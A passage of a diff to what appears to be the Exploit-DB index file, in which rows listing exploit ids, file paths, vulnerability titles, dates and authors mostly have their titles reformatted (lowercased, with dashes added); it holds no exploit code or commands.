-18859,7 +18857,7 @@ id,file,description,date,author,platform,type,port 21599,platforms/windows/remote/21599.txt,"Working Resources BadBlue 1.7.3 cleanSearchString() Cross Site Scripting Vulnerability",2002-07-08,"Matthew Murphy",windows,remote,0 21600,platforms/windows/dos/21600.txt,"Working Resources BadBlue 1.7.3 Get Request Denial Of Service Vulnerability",2002-07-08,"Matthew Murphy",windows,dos,0 21601,platforms/windows/remote/21601.c,"Microsoft Foundation Class Library 7.0 ISAPI Buffer Overflow Vulnerability",2002-07-08,"Matthew Murphy",windows,remote,0 -21602,platforms/linux/remote/21602.txt,"Icecast Server 1.3.12 Directory Traversal Information Disclosure Vulnerability",2002-07-09,glaive,linux,remote,0 +21602,platforms/linux/remote/21602.txt,"icecast server 1.3.12 - Directory Traversal information disclosure vulnerability",2002-07-09,glaive,linux,remote,0 21603,platforms/multiple/remote/21603.txt,"iPlanet Web Server 4.1 Search Component File Disclosure Vulnerability",2002-07-09,"Qualys Corporation",multiple,remote,0 21604,platforms/linux/remote/21604.txt,"Apache Tomcat 4.0.3 Servlet Mapping Cross Site Scripting Vulnerability",2002-07-10,"Matt Moore",linux,remote,0 21605,platforms/windows/remote/21605.txt,"Apache Tomcat 4.0.3 DOS Device Name Cross Site Scripting Vulnerability",2002-07-10,"Matt Moore",windows,remote,0 @@ -18993,10 +18991,10 @@ id,file,description,date,author,platform,type,port 21736,platforms/hardware/dos/21736.txt,"LG LR3100p 1.30 Series Router IP Packet Flags Denial of Service Vulnerability",2002-08-22,"Lukasz Bromirski",hardware,dos,0 21737,platforms/windows/dos/21737.txt,"Cyme ChartFX Client Server ActiveX Control Array Indexing Vulnerability",2012-10-04,"Francis Provencher",windows,dos,0 21739,platforms/windows/dos/21739.pl,"JPEGsnoop <= 1.5.2 WriteAV Crash PoC",2012-10-04,"Jean Pascal Pereira",windows,dos,0 -21740,platforms/php/webapps/21740.txt,"phpMyChat Plus 1.94 RC1 - Multiple Remote Vulnerabilities",2012-10-04,L0n3ly-H34rT,php,webapps,0 +21740,platforms/php/webapps/21740.txt,"phpmychat plus 1.94 rc1 - Multiple Vulnerabilities",2012-10-04,L0n3ly-H34rT,php,webapps,0 21741,platforms/windows/dos/21741.txt,"XnView 1.99.1 JLS File Decompression Heap Overflow",2012-10-04,"Joseph Sheridan",windows,dos,0 -21742,platforms/php/webapps/21742.txt,"Template CMS 2.1.1 Multiple Vulnerabilities",2012-10-04,"High-Tech Bridge SA",php,webapps,0 -21743,platforms/php/webapps/21743.txt,"phpMyBitTorrent 2.04 Multiple Vulnerabilities",2012-10-04,waraxe,php,webapps,0 +21742,platforms/php/webapps/21742.txt,"template cms 2.1.1 - Multiple Vulnerabilities",2012-10-04,"High-Tech Bridge SA",php,webapps,0 +21743,platforms/php/webapps/21743.txt,"phpmybittorrent 2.04 - Multiple Vulnerabilities",2012-10-04,waraxe,php,webapps,0 21744,platforms/windows/webapps/21744.txt,"Novell Sentinel Log Manager <= 1.2.0.2 - Retention Policy Vulnerability",2012-10-04,"Piotr Chmylkowski",windows,webapps,0 21745,platforms/php/webapps/21745.txt,"Achievo 0.7/0.8/0.9 Remote File Include Command Execution Vulnerability",2002-08-22,"Jeroen Latour",php,webapps,0 21746,platforms/windows/dos/21746.c,"MS Windows 2000/NT 4/XP Network Share Provider SMB Request Buffer Overflow (1)",2002-08-22,"Frederic Deletang",windows,dos,0 @@ -19040,7 +19038,7 @@ id,file,description,date,author,platform,type,port 21784,platforms/linux/remote/21784.c,"Netris 0.3/0.4/0.5 Remote Memory Corruption Vulnerability",2002-09-09,V9,linux,remote,0 21785,platforms/windows/dos/21785.pl,"HCView WriteAV Crash PoC",2012-10-07,"Jean Pascal Pereira",windows,dos,0 21786,platforms/php/webapps/21786.php,"Blog Mod <= 0.1.9 (index.php, month parameter) SQL Injection",2012-10-07,WhiteCollarGroup,php,webapps,0 -21787,platforms/php/webapps/21787.rb,"MyAuth3 Blind SQL Injection",2012-10-07,"Marcio Almeida",php,webapps,0 +21787,platforms/php/webapps/21787.rb,"MyAuth3 - Blind SQL Injection",2012-10-07,"Marcio Almeida",php,webapps,0 21788,platforms/windows/dos/21788.pl,"FastStone Image Viewer 4.6 - ReadAVonIP Crash PoC",2012-10-07,"Jean Pascal Pereira",windows,dos,0 21789,platforms/windows/dos/21789.txt,"Alleged Outlook Express 5/6 Link Denial of Service Vulnerability",2002-09-09,"Stefano Zanero",windows,dos,0 21790,platforms/unix/local/21790.sh,"Cobalt RaQ authenticate Local Privilege Escalation Vulnerability",2002-06-28,"Charles Stevenson",unix,local,0 @@ -19213,7 +19211,7 @@ id,file,description,date,author,platform,type,port 21961,platforms/php/webapps/21961.txt,"MyMarket 1.71 Form_Header.PHP Cross-Site Scripting Vulnerability",2002-10-23,qber66,php,webapps,0 21962,platforms/cgi/webapps/21962.txt,"Mojo Mail 2.7 Email Form Cross Site Scripting Vulnerability",2002-10-24,"Daniel Boland",cgi,webapps,0 21963,platforms/windows/dos/21963.pl,"SolarWinds TFTP Server Standard Edition 5.0.55 Large UDP Packet Vulnerability",2002-10-24,D4rkGr3y,windows,dos,0 -21964,platforms/windows/remote/21964.txt,"SolarWinds TFTP Server Standard Edition 5.0.55 Directory Traversal Vulnerability",2002-10-25,"Matthew Murphy",windows,remote,0 +21964,platforms/windows/remote/21964.txt,"solarwinds tftp server standard edition 5.0.55 - Directory Traversal vulnerability",2002-10-25,"Matthew Murphy",windows,remote,0 21965,platforms/windows/dos/21965.txt,"Alt-N MDaemon 6.0.x POP Server Buffer Overflow Vulnerability",2002-10-28,D4rkGr3y,windows,dos,0 21966,platforms/cgi/webapps/21966.txt,"MailReader.com 2.3.x NPH-MR.CGI File Disclosure Vulnerability",2002-10-28,pokleyzz,cgi,webapps,0 21967,platforms/php/webapps/21967.txt,"Benjamin Lefevre Dobermann Forum 0.x entete.php subpath Parameter Remote File Inclusion",2002-10-28,frog,php,webapps,0 @@ -19253,9 +19251,9 @@ id,file,description,date,author,platform,type,port 22002,platforms/linux/local/22002.txt,"QNX RTOS 6.2 Application Packager Non-Explicit Path Execution Vulnerability",2002-11-08,Texonet,linux,local,0 22003,platforms/php/webapps/22003.txt,"MyBB Profile Albums Plugin 0.9 (albums.php, album parameter) - SQL Injection",2012-10-16,Zixem,php,webapps,0 22004,platforms/php/webapps/22004.txt,"Joomla iCagenda Component (id parameter) Multiple Vulnerabilities",2012-10-16,Dark-Puzzle,php,webapps,0 -22005,platforms/hardware/webapps/22005.txt,"Visual Tools DVR <= 3.0.6.16, VX Series <= 4.2.19.2 Multiple Vulnerabilities",2012-10-16,"Andrea Fabrizi",hardware,webapps,0 +22005,platforms/hardware/webapps/22005.txt,"visual tools dvr <= 3.0.6.16, vx series <= 4.2.19.2 - Multiple Vulnerabilities",2012-10-16,"Andrea Fabrizi",hardware,webapps,0 22006,platforms/windows/dos/22006.txt,"Ezhometech EzServer 7.0 Remote Heap Corruption Vulnerability",2012-10-16,"Lorenzo Cantoni",windows,dos,0 -22007,platforms/windows/remote/22007.txt,"Samsung Kies 2.3.2.12054_20 Multiple Vulnerabilities",2012-10-16,"High-Tech Bridge SA",windows,remote,0 +22007,platforms/windows/remote/22007.txt,"Samsung Kies 2.3.2.12054_20 - Multiple Vulnerabilities",2012-10-16,"High-Tech Bridge SA",windows,remote,0 22009,platforms/php/webapps/22009.txt,"EZ Systems HTTPBench 1.1 Information Disclosure Vulnerability",2002-11-11,"Tacettin Karadeniz",php,webapps,0 22010,platforms/multiple/dos/22010.txt,"Hotfoon Dialer 4.0 Buffer Overflow Vulnerability",2002-11-11,"S G Masood",multiple,dos,0 22011,platforms/linux/dos/22011.c,"ISC BIND 8.3.x OPT Record Large UDP Denial of Service Vulnerability",2002-11-12,spybreak,linux,dos,0 @@ -19265,7 +19263,7 @@ id,file,description,date,author,platform,type,port 22015,platforms/cgi/webapps/22015.txt,"W3Mail 1.0.6 File Disclosure Vulnerability",2002-11-12,"Tim Brown",cgi,webapps,0 22016,platforms/linux/remote/22016.c,"LibHTTPD 1.2 POST Buffer Overflow Vulnerability",2002-11-13,Xpl017Elz,linux,remote,0 22017,platforms/php/webapps/22017.txt,"PHPBB Advanced Quick Reply Hack 1.0/1.1 Remote File Include Vulnerability",2002-11-13,"Hai Nam Luke",php,webapps,0 -22018,platforms/windows/remote/22018.pl,"KeyFocus KF Web Server 1.0.8 Directory Traversal Vulnerability",2002-11-13,mattmurphy,windows,remote,0 +22018,platforms/windows/remote/22018.pl,"keyfocus kf web server 1.0.8 - Directory Traversal vulnerability",2002-11-13,mattmurphy,windows,remote,0 22019,platforms/windows/dos/22019.pl,"IISPop 1.161/1.181 Remote Buffer Overflow Denial of Service Vulnerability",2002-11-14,"securma massine",windows,dos,0 22020,platforms/multiple/remote/22020.pl,"Perception LiteServe 2.0 CGI Source Disclosure Vulnerability",2002-11-14,mattmurphy,multiple,remote,0 22021,platforms/linux/remote/22021.sh,"Lonerunner Zeroo HTTP Server 1.5 Remote Buffer Overflow Vulnerability",2002-11-16,"dong-h0un U",linux,remote,0 @@ -19286,7 +19284,7 @@ id,file,description,date,author,platform,type,port 22036,platforms/unix/remote/22036.pl,"XFree86 X11R6 3.3.x Font Server Remote Buffer Overrun Vulnerability",2002-11-25,"TESO Security",unix,remote,0 22037,platforms/php/webapps/22037.txt,"PHP-Nuke 5.x/6.0/6.5 BETA 1 Multiple Cross Site Scripting Vulnerabilities",2002-11-25,"Matthew Murphy",php,webapps,0 22038,platforms/php/webapps/22038.txt,"Sisfokol 4.0 Arbitrary File Upload",2012-10-17,cr4wl3r,php,webapps,0 -22039,platforms/php/webapps/22039.txt,"Symphony CMS 2.3 Multiple Vulnerabilities",2012-10-17,Wireghoul,php,webapps,0 +22039,platforms/php/webapps/22039.txt,"symphony cms 2.3 - Multiple Vulnerabilities",2012-10-17,Wireghoul,php,webapps,0 22040,platforms/jsp/webapps/22040.txt,"ManageEngine Support Center Plus <= 7908 - Multiple Vulnerabilities",2012-10-17,xistence,jsp,webapps,0 22041,platforms/multiple/webapps/22041.txt,"Oracle WebCenter Sites (FatWire Content Server) Multiple Vulnerabilities",2012-10-17,"SEC Consult",multiple,webapps,0 22042,platforms/php/webapps/22042.php,"VBulletin 2.0.x/2.2.x members2.php Cross Site Scripting Vulnerability",2002-11-25,Sp.IC,php,webapps,0 @@ -19303,21 +19301,21 @@ id,file,description,date,author,platform,type,port 22053,platforms/multiple/dos/22053.txt,"Moby NetSuite 1.0/1.2 POST Handler Buffer Overflow Vulnerability",2002-11-29,"Matthew Murphy",multiple,dos,0 22054,platforms/cgi/remote/22054.c,"Boozt Standard 0.9.8 index.cgi Buffer Overrun Vulnerability",2002-11-29,BrainStorm,cgi,remote,0 22055,platforms/linux/local/22055.txt,"SuidPerl 5.6 Information Disclosure Vulnerability",2002-11-29,zen-parse,linux,local,0 -22056,platforms/linux/dos/22056.txt,"Pserv 2.0 HTTP Version Specifier Buffer Overflow Vulnerability",2002-11-30,"Matthew Murphy",linux,dos,0 +22056,platforms/linux/dos/22056.txt,"Pserv 2.0 - HTTP Version Specifier Buffer Overflow Vulnerability",2002-11-30,"Matthew Murphy",linux,dos,0 22057,platforms/linux/remote/22057.pl,"Pserv 2.0 User-Agent HTTP Header Buffer Overflow Vulnerability (1)",2002-11-30,Sapient2003,linux,remote,0 22058,platforms/linux/remote/22058.c,"Pserv 2.0 User-Agent HTTP Header Buffer Overflow Vulnerability (2)",2002-11-30,jsk,linux,remote,0 22059,platforms/linux/dos/22059.pl,"Pserv 2.0 HTTP Request Parsing Buffer Overflow",2002-11-01,"Matthew Murphy",linux,dos,0 22060,platforms/hardware/dos/22060.txt,"3Com SuperStack 3 NBX 4.0/4.1 FTPD Denial of Service Vulnerability",2002-12-02,"Michael S. Scheidell",hardware,dos,0 22061,platforms/linux/dos/22061.txt,"Cyrus IMAPD 1.4/1.5.19/2.0.12/2.0.16/2.1.9/2.1.10 Pre-Login Heap Corruption Vulnerability",2002-12-02,"Timo Sirainen",linux,dos,0 22062,platforms/hardware/dos/22062.py,"Linksys Devices 1.42/1.43 GET Request Buffer Overflow Vulnerability",2002-12-03,"Core Security",hardware,dos,0 -22063,platforms/linux/remote/22063.c,"Zeroo HTTP Server 1.5 Directory Traversal Vulnerability (1)",2002-11-22,mikecc,linux,remote,0 -22064,platforms/linux/remote/22064.pl,"Zeroo HTTP Server 1.5 Directory Traversal Vulnerability (2)",2002-11-22,mattmurphy,linux,remote,0 +22063,platforms/linux/remote/22063.c,"zeroo http server 1.5 - Directory Traversal vulnerability (1)",2002-11-22,mikecc,linux,remote,0 +22064,platforms/linux/remote/22064.pl,"zeroo http server 1.5 - Directory Traversal vulnerability (2)",2002-11-22,mattmurphy,linux,remote,0 22065,platforms/php/webapps/22065.html,"phpBB 2.0.3 search.php Cross Site Scripting Vulnerability",2002-12-03,f_a_a,php,webapps,0 22066,platforms/linux/local/22066.c,"Exim Internet Mailer 3.35/3.36/4.10 Format String Vulnerability",2002-12-04,"Thomas Wana",linux,local,0 22067,platforms/unix/local/22067.txt,"SAP DB 7.3 .00 Symbolic Link Vulnerability",2002-12-04,"SAP Security",unix,local,0 22068,platforms/unix/dos/22068.pl,"Apache 1.3.x,Tomcat 4.0.x/4.1.x Mod_JK Chunked Encoding Denial Of Service Vulnerability",2002-12-04,Sapient2003,unix,dos,0 22069,platforms/multiple/local/22069.py,"Oracle Database Authentication Protocol Security Bypass",2012-10-18,"Esteban Martinez Fayo",multiple,local,0 -22070,platforms/windows/webapps/22070.py,"OTRS 3.1 Stored XSS Vulnerability",2012-10-18,"Mike Eduard",windows,webapps,0 +22070,platforms/windows/webapps/22070.py,"otrs 3.1 - Stored XSS vulnerability",2012-10-18,"Mike Eduard",windows,webapps,0 22071,platforms/php/webapps/22071.txt,"FireStorm Professional Real Estate Wordpress Plugin 2.06.01 SQL Injection Vulnerability",2012-10-18,"Ashiyane Digital Security Team",php,webapps,0 22072,platforms/linux/remote/22072.c,"Cobalt RaQ4 Administrative Interface Command Execution Vulnerability",2002-12-05,grazer,linux,remote,0 22073,platforms/php/webapps/22073.txt,"APBoard 2.0 2 Unauthorized Thread Reading Vulnerability",2002-12-06,"DNA ESC",php,webapps,0 @@ -19325,7 +19323,7 @@ id,file,description,date,author,platform,type,port 22075,platforms/php/webapps/22075.txt,"Ultimate PHP Board 1.0 final beta ViewTopic.PHP Directory Contents Browsing",2002-11-08,euronymous,php,webapps,0 22076,platforms/php/webapps/22076.txt,"Ultimate PHP Board Board 1.0 final beta ViewTopic.PHP Cross Site Scripting Vulnerability",2002-11-08,euronymous,php,webapps,0 22077,platforms/php/webapps/22077.txt,"vBulletin 2.2.7/2.2.8 HTML Injection Vulnerability",2002-11-09,"Dorin Balanica",php,webapps,0 -22078,platforms/windows/remote/22078.txt,"Mollensoft Software Enceladus Server Suite 2.6.1/3.9 Directory Traversal",2002-11-09,luca.ercoli@inwind.it,windows,remote,0 +22078,platforms/windows/remote/22078.txt,"mollensoft software enceladus server suite 2.6.1/3.9 - Directory Traversal",2002-11-09,luca.ercoli@inwind.it,windows,remote,0 22079,platforms/linux/dos/22079.sh,"ProFTPD 1.2.x STAT Command Denial Of Service Vulnerability",2002-12-09,"Rob klein Gunnewiek",linux,dos,0 22080,platforms/php/webapps/22080.txt,"Xoops 1.3.5 Private Message System Font Attributes HTML Injection",2002-11-09,"fred magistrat",php,webapps,0 22081,platforms/windows/dos/22081.pl,"Mollensoft Software Enceladus Server Suite 3.9 FTP Command Buffer Overflow",2002-12-09,"Tamer Sahin",windows,dos,0 @@ -19401,11 +19399,11 @@ id,file,description,date,author,platform,type,port 22153,platforms/php/webapps/22153.pl,"Joomla Kunena Component (index.php, search parameter) SQL Injection",2012-10-22,D35m0nd142,php,webapps,0 22154,platforms/windows/dos/22154.pl,"RealPlayer 15.0.6.14 .3gp Crash PoC",2012-10-22,coolkaveh,windows,dos,0 22155,platforms/windows/dos/22155.pl,"Adobe Reader 10.1.4 Crash PoC",2012-10-22,coolkaveh,windows,dos,0 -22156,platforms/php/webapps/22156.txt,"White Label CMS v 1.5 CSRF w/ persistent XSS",2012-10-22,pcsjj,php,webapps,0 +22156,platforms/php/webapps/22156.txt,"White Label CMS 1.5 - CSRF & Persistent XSS",2012-10-22,pcsjj,php,webapps,0 22157,platforms/php/webapps/22157.txt,"Schoolhos CMS Beta 2.29 (index.php, id parameter) SQL Injection",2012-10-22,Cumi,php,webapps,0 -22158,platforms/php/webapps/22158.txt,"Wordpress Social Discussions Plugin 6.1.1 Multiple Vulnerabilities",2012-10-22,waraxe,php,webapps,0 -22159,platforms/php/webapps/22159.txt,"Subrion CMS 2.2.1 Multiple Vulnerabilities",2012-10-22,"High-Tech Bridge SA",php,webapps,0 -22160,platforms/php/webapps/22160.txt,"ATutor 1.2 Multiple Vulnerabilities",2012-10-22,"High-Tech Bridge SA",php,webapps,0 +22158,platforms/php/webapps/22158.txt,"wordpress social discussions plugin 6.1.1 - Multiple Vulnerabilities",2012-10-22,waraxe,php,webapps,0 +22159,platforms/php/webapps/22159.txt,"subrion cms 2.2.1 - Multiple Vulnerabilities",2012-10-22,"High-Tech Bridge SA",php,webapps,0 +22160,platforms/php/webapps/22160.txt,"atutor 1.2 - Multiple Vulnerabilities",2012-10-22,"High-Tech Bridge SA",php,webapps,0 22161,platforms/windows/remote/22161.rb,"Turbo FTP Server 1.30.823 PORT Overflow",2012-10-23,metasploit,windows,remote,21 22162,platforms/windows/dos/22162.txt,"Symantec Norton Internet Security 2003 ICMP Packet Flood DOS",2003-01-13,"Pavel P",windows,dos,0 22163,platforms/php/webapps/22163.txt,"Geeklog 1.3.7 Profiles.PHP Multiple Cross-Site Scripting Vulnerabilities",2003-01-14,snooq,php,webapps,0 @@ -19460,7 +19458,7 @@ id,file,description,date,author,platform,type,port 22213,platforms/windows/remote/22213.txt,"Opera 7.0 JavaScript Console Attribute Injection Vulnerability",2003-02-04,"GreyMagic Software",windows,remote,0 22214,platforms/windows/dos/22214.pl,"Apple QuickTime Player 7.7.2 Crash PoC",2012-10-24,coolkaveh,windows,dos,0 22215,platforms/windows/dos/22215.txt,"Microsoft Office Word 2010 Crash PoC",2012-10-24,coolkaveh,windows,dos,0 -22216,platforms/php/webapps/22216.txt,"Bitweaver 2.8.1 Multiple Vulnerabilities",2012-10-24,"Trustwave's SpiderLabs",php,webapps,0 +22216,platforms/php/webapps/22216.txt,"bitweaver 2.8.1 - Multiple Vulnerabilities",2012-10-24,"Trustwave's SpiderLabs",php,webapps,0 22217,platforms/windows/remote/22217.txt,"Opera 7 Image Rendering HTML Injection Vulnerability",2003-02-04,"GreyMagic Software",windows,remote,0 22218,platforms/windows/remote/22218.txt,"Opera 7.0 History Object Information Disclosure Weakness",2003-02-04,"GreyMagic Software",windows,remote,0 22219,platforms/windows/remote/22219.txt,"Opera 7.0 Error Message History Disclosure Weakness",2003-02-04,"GreyMagic Software",windows,remote,0 @@ -19501,7 +19499,7 @@ id,file,description,date,author,platform,type,port 22255,platforms/windows/dos/22255.txt,"Microsoft Windows XP/95/98/2000/NT 4 Riched20.dll Attribute Buffer Overflow Vulnerability",2003-02-17,"Jie Dong",windows,dos,0 22256,platforms/php/webapps/22256.txt,"D-Forum 1 header Parameter Remote File Inclusion",2003-02-18,frog,php,webapps,0 22257,platforms/php/webapps/22257.txt,"D-Forum 1 footer Parameter Remote File Inclusion",2003-02-18,frog,php,webapps,0 -22258,platforms/windows/dos/22258.txt,"Aladdin Knowledge System Ltd. PrivAgent ActiveX Control 2.0 Multiple Vulnerabilities",2012-10-26,shinnai,windows,dos,0 +22258,platforms/windows/dos/22258.txt,"Aladdin Knowledge System Ltd. PrivAgent ActiveX Control 2.0 - Multiple Vulnerabilities",2012-10-26,shinnai,windows,dos,0 22259,platforms/linux/dos/22259.c,"BitchX 1.0 Malformed RPL_NAMREPLY Denial Of Service Vulnerability",2003-01-30,argv,linux,dos,0 22260,platforms/cgi/webapps/22260.c,"cPanel 5.0 Guestbook.cgi Remote Command Execution Vulnerability (1)",2003-02-19,bob,cgi,webapps,0 22261,platforms/cgi/webapps/22261.pl,"cPanel 5.0 Guestbook.cgi Remote Command Execution Vulnerability (2)",2003-02-19,CaMaLeoN,cgi,webapps,0 @@ -19610,10 +19608,10 @@ id,file,description,date,author,platform,type,port 22368,platforms/windows/remote/22368.txt,"Microsoft Windows XP/2000/NT 4 ntdll.dll Buffer Overflow Vulnerability (4)",2003-03-17,aT4r@3wdesign.es,windows,remote,0 22369,platforms/linux/remote/22369.txt,"Ximian Evolution 1.x UUEncoding Parsing Memory Corruption Vulnerability",2003-03-17,"Core Security",linux,remote,0 22370,platforms/linux/dos/22370.txt,"Ximian Evolution 1.x UUEncoding Denial of Service Vulnerability",2003-03-17,"Core Security",linux,dos,0 -22371,platforms/linux/remote/22371.txt,"Ximian Evolution 1.x MIME image/* Content-Type Data Inclusion Vulnerability",2003-03-19,"Core Security",linux,remote,0 -22372,platforms/php/webapps/22372.txt,"VaM Shop 1.69 Multiple Vulnerabilities",2012-10-31,"Security Effect Team",php,webapps,0 +22371,platforms/linux/remote/22371.txt,"Ximian Evolution 1.x - MIME image/* Content-Type Data Inclusion Vulnerability",2003-03-19,"Core Security",linux,remote,0 +22372,platforms/php/webapps/22372.txt,"vam shop 1.69 - Multiple Vulnerabilities",2012-10-31,"Security Effect Team",php,webapps,0 22373,platforms/php/webapps/22373.txt,"PG Dating Pro 1.0 CMS - Multiple Vulnerabilities",2012-10-31,Vulnerability-Lab,php,webapps,0 -22374,platforms/php/webapps/22374.txt,"Wordpress FoxyPress Plugin 0.4.2.5 Multiple Vulnerabilities",2012-10-31,waraxe,php,webapps,0 +22374,platforms/php/webapps/22374.txt,"wordpress foxypress plugin 0.4.2.5 - Multiple Vulnerabilities",2012-10-31,waraxe,php,webapps,0 22375,platforms/windows/remote/22375.rb,"Aladdin Knowledge System Ltd ChooseFilePath Buffer Overflow",2012-11-01,metasploit,windows,remote,0 22376,platforms/linux/local/22376.txt,"GNOME Eye Of Gnome 1.0.x/1.1.x/2.2 Format String Vulnerability",2003-03-28,"Core Security",linux,local,0 22377,platforms/cgi/webapps/22377.txt,"Kebi Academy 2001 Input Validation Vulnerability",2003-03-17,"dong-h0un U",cgi,webapps,0 @@ -19667,7 +19665,7 @@ id,file,description,date,author,platform,type,port 22427,platforms/php/webapps/22427.txt,"Wordpress All Video Gallery 1.1 SQL Injection Vulnerability",2012-11-02,"Ashiyane Digital Security Team",php,webapps,0 22429,platforms/php/webapps/22429.txt,"vBulletin ChangUonDyU Advanced Statistics SQL Injection Vulnerability",2012-11-02,Juno_okyo,php,webapps,0 22430,platforms/php/webapps/22430.txt,"PrestaShop <= 1.5.1 Persistent XSS",2012-11-02,"David Sopas",php,webapps,0 -22431,platforms/php/webapps/22431.txt,"Achievo 1.4.5 Multiple Vulnerabilities",2012-11-02,"Canberk BOLAT",php,webapps,0 +22431,platforms/php/webapps/22431.txt,"achievo 1.4.5 - Multiple Vulnerabilities",2012-11-02,"Canberk BOLAT",php,webapps,0 22432,platforms/windows/remote/22432.rb,"HP Intelligent Management Center UAM Buffer Overflow",2012-11-04,metasploit,windows,remote,0 22433,platforms/linux/dos/22433.pl,"Monkey HTTP Daemon 0.4/0.5/0.6 Excessive POST Data Buffer Overflow Vulnerability",2003-03-24,"Matthew Murphy",linux,dos,0 22434,platforms/windows/remote/22434.txt,"Sambar Server 5.x Information Disclosure Vulnerability",2003-03-27,"gregory Le Bras",windows,remote,0 @@ -19757,7 +19755,7 @@ id,file,description,date,author,platform,type,port 22520,platforms/php/webapps/22520.txt,"OpenBB 1.0/1.1 Member.PHP Remote SQL Injection Vulnerability",2003-04-22,"Albert Puigsech Galicia",php,webapps,0 22521,platforms/php/webapps/22521.c,"XMB Forum 1.8 Member.PHP SQL Injection Vulnerability",2003-04-22,zeez@bbugs.org,php,webapps,0 22522,platforms/multiple/remote/22522.pl,"Web Protector 2.0 Trivial Encryption Weakness",2003-04-22,rjfix,multiple,remote,0 -22524,platforms/php/webapps/22524.txt,"Zenphoto 1.4.3.3 Multiple Vulnerabilities",2012-11-06,waraxe,php,webapps,0 +22524,platforms/php/webapps/22524.txt,"zenphoto 1.4.3.3 - Multiple Vulnerabilities",2012-11-06,waraxe,php,webapps,0 22525,platforms/windows/remote/22525.rb,"EMC Networker Format String",2012-11-07,metasploit,windows,remote,0 22526,platforms/windows/remote/22526.rb,"WinRM VBS Remote Code Execution",2012-11-07,metasploit,windows,remote,0 22527,platforms/linux/dos/22527.c,"Xeneo Web Server 2.2.10 Undisclosed Buffer Overflow Vulnerability",2003-04-23,badpack3t,linux,dos,0 @@ -19887,7 +19885,7 @@ id,file,description,date,author,platform,type,port 22651,platforms/php/webapps/22651.txt,"PostNuke 0.72x Phoenix Glossary Module SQL Injection Vulnerability",2003-05-26,"Lorenzo Manuel Hernandez Garcia-Hierro",php,webapps,0 22652,platforms/windows/local/22652.py,"Zoner Photo Studio 15 Build 3 (Zps.exe) - Registry Value Parsing Exploit",2012-11-12,"Julien Ahrens",windows,local,0 22653,platforms/windows/dos/22653.py,"Smadav Anti Virus 9.1 Crash PoC",2012-11-12,"Mada R Perdhana",windows,dos,0 -22654,platforms/php/webapps/22654.txt,"BananaDance Wiki b2.2 Multiple Vulnerabilities",2012-11-12,Vulnerability-Lab,php,webapps,0 +22654,platforms/php/webapps/22654.txt,"bananadance wiki b2.2 - Multiple Vulnerabilities",2012-11-12,Vulnerability-Lab,php,webapps,0 22655,platforms/windows/dos/22655.txt,"Microsoft Publisher 2013 Crash PoC",2012-11-12,coolkaveh,windows,dos,0 22656,platforms/php/webapps/22656.py,"vBulletin vBay <= 1.1.9 - Error-Based SQL Injection",2012-11-12,"Dan UK",php,webapps,0 22657,platforms/multiple/remote/22657.rb,"Java Applet JAX-WS Remote Code Execution",2012-11-13,metasploit,multiple,remote,0 @@ -19923,7 +19921,7 @@ id,file,description,date,author,platform,type,port 22688,platforms/cgi/webapps/22688.txt,"M-TECH P-Synch 6.2.5 nph-psf.exe css Parameter Remote File Inclusion",2003-05-29,JeiAr,cgi,webapps,0 22689,platforms/cgi/webapps/22689.txt,"M-TECH P-Synch 6.2.5 nph-psa.exe css Parameter Remote File Inclusion",2003-05-29,JeiAr,cgi,webapps,0 22690,platforms/windows/dos/22690.c,"Activity Monitor 2002 2.6 Remote Denial of Service Vulnerability",2003-05-29,"Luca Ercoli",windows,dos,0 -22691,platforms/windows/remote/22691.txt,"Pablo Software Solutions Baby FTP Server 1.2 Directory Traversal Vulnerability",2003-05-29,dr_insane,windows,remote,0 +22691,platforms/windows/remote/22691.txt,"pablo software solutions baby ftp server 1.2 - Directory Traversal vulnerability",2003-05-29,dr_insane,windows,remote,0 22692,platforms/cgi/webapps/22692.txt,"Zeus Web Server 4.x Admin Interface VS_Diag.CGI Cross Site Scripting Vulnerability",2003-05-29,"Hugo Vazquez",cgi,webapps,0 22693,platforms/php/webapps/22693.txt,"cPanel 5/6,Formail-Clone E-Mail Restriction Bypass Vulnerability",2003-05-30,"Chad C. Keep",php,webapps,0 22694,platforms/windows/dos/22694.c,"Desktop Orbiter 2.0 1 Resource Exhaustion Denial Of Service Vulnerability",2003-05-30,"Luca Ercoli",windows,dos,0 @@ -19940,7 +19938,7 @@ id,file,description,date,author,platform,type,port 22705,platforms/php/webapps/22705.txt,"Webfroot Shoutbox 2.32 Expanded.PHP Remote Directory Traversal Vulnerability",2003-06-02,_6mO_HaCk,php,webapps,0 22706,platforms/windows/dos/22706.asm,"Crob FTP Server 2.50.4 Remote Username Format String Vulnerability",2003-06-02,"Luca Ercoli",windows,dos,0 22707,platforms/windows/dos/22707.txt,"Novell Groupwise Internet Agent LDAP BIND Request Overflow Vulnerability",2012-11-14,"Francis Provencher",windows,dos,0 -22708,platforms/php/webapps/22708.txt,"dotProject <= 2.1.6 Remote File Inclusion Vulnerability",2012-11-14,dun,php,webapps,0 +22708,platforms/php/webapps/22708.txt,"dotproject <= 2.1.6 - Remote File Inclusion Vulnerability",2012-11-14,dun,php,webapps,0 22709,platforms/php/webapps/22709.txt,"Narcissus Remote Command Execution Vulnerability",2012-11-14,dun,php,webapps,0 22710,platforms/php/webapps/22710.txt,"friendsinwar FAQ Manager SQL Injection (authbypass) Vulnerability",2012-11-14,d3b4g,php,webapps,0 22711,platforms/php/webapps/22711.txt,"Myrephp Business Directory Multiple Vulnerabilities",2012-11-14,d3b4g,php,webapps,0 @@ -19989,7 +19987,7 @@ id,file,description,date,author,platform,type,port 22755,platforms/multiple/remote/22755.txt,"Aiglon Web Server 2.0 Installation Path Information Disclosure Weakness",2003-06-10,"Ziv Kamir",multiple,remote,0 22756,platforms/aix/local/22756.pl,"IBM AIX 4.3.x/5.1 LSMCODE Environment Variable Local Buffer Overflow Vulnerability",2003-06-01,watercloud,aix,local,0 22757,platforms/windows/dos/22757.c,"ArGoSoft Mail Server 1.8.3 .5 Multiple GET Requests Denial Of Service Vulnerability",2003-06-11,posidron,windows,dos,0 -22758,platforms/windows/remote/22758.txt,"silentThought Simple Web Server 1.0 Directory Traversal Vulnerability",2003-06-12,"Ziv Kamir",windows,remote,0 +22758,platforms/windows/remote/22758.txt,"silentthought simple web server 1.0 - Directory Traversal vulnerability",2003-06-12,"Ziv Kamir",windows,remote,0 22759,platforms/windows/dos/22759.txt,"WebBBS Pro 1.18 - GET Request Denial Of Service Vulnerability",2003-06-12,"Ziv Kamir",windows,dos,0 22760,platforms/php/webapps/22760.txt,"Sphera HostingDirector 1.0/2.0/3.0 VDS Control Panel Account Configuration Modification Vulnerability",2003-06-13,"Lorenzo Hernandez Garcia-Hierro",php,webapps,0 22761,platforms/php/webapps/22761.txt,"PostNuke 